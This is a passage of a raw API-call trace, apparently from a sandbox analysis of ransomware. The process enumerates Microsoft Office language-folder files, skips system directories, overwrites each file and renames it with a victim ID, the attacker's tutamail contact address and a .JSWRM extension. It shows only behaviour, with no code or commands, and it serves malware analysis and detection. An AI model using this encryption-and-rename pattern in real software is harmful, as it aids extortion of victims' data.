out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0121.608] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0121.608] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TellMeOutlookAddr.nrr", cchWideChar=21, lpMultiByteStr=0x240fc0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TellMeOutlookAddr.nrr", lpUsedDefaultChar=0x0) returned 21 [0121.608] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0121.608] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0121.608] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TellMeOutlookAddr.nrr", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0121.608] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0121.608] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TellMeOutlookAddr.nrr", cchWideChar=21, lpMultiByteStr=0x2411c8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TellMeOutlookAddr.nrr", lpUsedDefaultChar=0x0) returned 21 [0121.608] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0121.608] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0121.608] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0121.608] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0121.608] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0121.608] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0121.608] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\TellMeOutlookAddr.nrr" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\tellmeoutlookaddr.nrr"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0121.609] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=252356) returned 1 [0121.609] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.609] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1d8 [0121.609] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0121.620] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.620] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0121.621] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0121.621] CloseHandle (hObject=0x238) returned 1 [0121.621] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0121.621] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0121.621] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0121.621] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0121.621] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0121.621] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0121.621] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0121.621] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0121.621] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0121.621] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0121.621] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0121.621] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0121.621] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0121.621] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0121.621] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\TellMeOutlookAddr.nrr" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\tellmeoutlookaddr.nrr"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\TellMeOutlookAddr.nrr.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\tellmeoutlookaddr.nrr.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0121.622] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0121.622] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0121.622] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0121.622] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0121.622] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0121.622] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xaebc65e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xaebc65e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xaebc65e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x448f8, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="TellMeOutlookAppt.nrr", cAlternateFileName="TELLME~2.NRR")) returned 1 [0121.622] lstrcmpiW (lpString1="TellMeOutlookAppt.nrr", lpString2=".") returned 1 [0121.622] lstrcmpiW (lpString1="TellMeOutlookAppt.nrr", lpString2="..") returned 1 [0121.622] lstrcmpiW (lpString1="TellMeOutlookAppt.nrr", lpString2="...") returned 1 [0121.622] lstrcmpiW (lpString1="TellMeOutlookAppt.nrr", lpString2="windows") returned -1 [0121.622] lstrcmpiW (lpString1="TellMeOutlookAppt.nrr", lpString2="recovery") returned 1 [0121.622] lstrcmpiW (lpString1="TellMeOutlookAppt.nrr", lpString2="perflogs") returned 1 [0121.622] lstrcmpiW (lpString1="TellMeOutlookAppt.nrr", lpString2="documents and settings") returned 1 [0121.622] lstrcmpiW (lpString1="TellMeOutlookAppt.nrr", lpString2="$RECYCLE.BIN") returned 1 [0121.622] lstrcmpiW (lpString1="TellMeOutlookAppt.nrr", lpString2="system volume information") returned 1 [0121.622] lstrcmpiW (lpString1="TellMeOutlookAppt.nrr", lpString2="msocache") returned 1 [0121.622] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0121.622] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TellMeOutlookAppt.nrr", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0121.622] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0121.622] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TellMeOutlookAppt.nrr", cchWideChar=21, lpMultiByteStr=0x2413a8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TellMeOutlookAppt.nrr", lpUsedDefaultChar=0x0) returned 21 [0121.623] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0121.623] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0121.623] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TellMeOutlookAppt.nrr", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0121.623] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0121.623] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TellMeOutlookAppt.nrr", cchWideChar=21, lpMultiByteStr=0x241330, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TellMeOutlookAppt.nrr", lpUsedDefaultChar=0x0) returned 21 [0121.623] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0121.623] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0121.623] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0121.623] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0121.623] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0121.623] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0121.623] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\TellMeOutlookAppt.nrr" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\tellmeoutlookappt.nrr"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0121.623] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=280824) returned 1 [0121.624] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.624] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1d8 [0121.624] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0121.668] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.668] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0121.668] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0121.668] CloseHandle (hObject=0x238) returned 1 [0121.668] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0121.668] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0121.668] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0121.668] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0121.668] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0121.669] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0121.669] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0121.669] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0121.669] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0121.669] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0121.669] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0121.669] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0121.669] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0121.669] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0121.669] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\TellMeOutlookAppt.nrr" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\tellmeoutlookappt.nrr"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\TellMeOutlookAppt.nrr.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\tellmeoutlookappt.nrr.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0121.670] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0121.670] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0121.670] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0121.670] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0121.670] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0121.670] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xaf2ed8f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xaf2ed8f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xaf2ed8f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x456d4, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="TellMeOutlookMail.nrr", cAlternateFileName="TE1EEB~1.NRR")) returned 1 [0121.670] lstrcmpiW (lpString1="TellMeOutlookMail.nrr", lpString2=".") returned 1 [0121.670] lstrcmpiW (lpString1="TellMeOutlookMail.nrr", lpString2="..") returned 1 [0121.670] lstrcmpiW (lpString1="TellMeOutlookMail.nrr", lpString2="...") returned 1 [0121.670] lstrcmpiW (lpString1="TellMeOutlookMail.nrr", lpString2="windows") returned -1 [0121.671] lstrcmpiW (lpString1="TellMeOutlookMail.nrr", lpString2="recovery") returned 1 [0121.671] lstrcmpiW (lpString1="TellMeOutlookMail.nrr", lpString2="perflogs") returned 1 [0121.671] lstrcmpiW (lpString1="TellMeOutlookMail.nrr", lpString2="documents and settings") returned 1 [0121.671] lstrcmpiW (lpString1="TellMeOutlookMail.nrr", lpString2="$RECYCLE.BIN") returned 1 [0121.671] lstrcmpiW (lpString1="TellMeOutlookMail.nrr", lpString2="system volume information") returned 1 [0121.671] lstrcmpiW (lpString1="TellMeOutlookMail.nrr", lpString2="msocache") returned 1 [0121.671] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0121.671] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TellMeOutlookMail.nrr", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0121.671] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0121.671] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TellMeOutlookMail.nrr", cchWideChar=21, lpMultiByteStr=0x241268, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TellMeOutlookMail.nrr", lpUsedDefaultChar=0x0) returned 21 [0121.671] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0121.671] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0121.671] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TellMeOutlookMail.nrr", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0121.671] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0121.671] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TellMeOutlookMail.nrr", cchWideChar=21, lpMultiByteStr=0x241330, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TellMeOutlookMail.nrr", lpUsedDefaultChar=0x0) returned 21 [0121.671] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0121.671] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cea0 [0121.671] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0121.671] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0121.671] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0121.671] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0121.672] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\TellMeOutlookMail.nrr" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\tellmeoutlookmail.nrr"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0121.672] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=284372) returned 1 [0121.672] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.672] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1d8 [0121.672] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0121.684] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.684] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0121.685] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0121.685] CloseHandle (hObject=0x238) returned 1 [0121.685] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0121.685] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0121.685] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0121.685] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0121.685] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0121.685] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0121.685] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0121.685] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0121.685] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0121.685] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0121.685] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0121.685] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0121.685] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0121.685] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0121.685] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\TellMeOutlookMail.nrr" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\tellmeoutlookmail.nrr"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\TellMeOutlookMail.nrr.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\tellmeoutlookmail.nrr.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0121.686] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0121.686] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0121.686] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0121.687] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0121.687] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0121.687] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xaf2ed8f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xaf2ed8f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xaf2ed8f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x41ae0, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="TellMeOutlookMailRead.nrr", cAlternateFileName="TE33EB~1.NRR")) returned 1 [0121.687] lstrcmpiW (lpString1="TellMeOutlookMailRead.nrr", lpString2=".") returned 1 [0121.687] lstrcmpiW (lpString1="TellMeOutlookMailRead.nrr", lpString2="..") returned 1 [0121.687] lstrcmpiW (lpString1="TellMeOutlookMailRead.nrr", lpString2="...") returned 1 [0121.687] lstrcmpiW (lpString1="TellMeOutlookMailRead.nrr", lpString2="windows") returned -1 [0121.687] lstrcmpiW (lpString1="TellMeOutlookMailRead.nrr", lpString2="recovery") returned 1 [0121.687] lstrcmpiW (lpString1="TellMeOutlookMailRead.nrr", lpString2="perflogs") returned 1 [0121.687] lstrcmpiW (lpString1="TellMeOutlookMailRead.nrr", lpString2="documents and settings") returned 1 [0121.687] lstrcmpiW (lpString1="TellMeOutlookMailRead.nrr", lpString2="$RECYCLE.BIN") returned 1 [0121.687] lstrcmpiW (lpString1="TellMeOutlookMailRead.nrr", lpString2="system volume information") returned 1 [0121.687] lstrcmpiW (lpString1="TellMeOutlookMailRead.nrr", lpString2="msocache") returned 1 [0121.687] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d578 [0121.687] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TellMeOutlookMailRead.nrr", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0121.687] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, 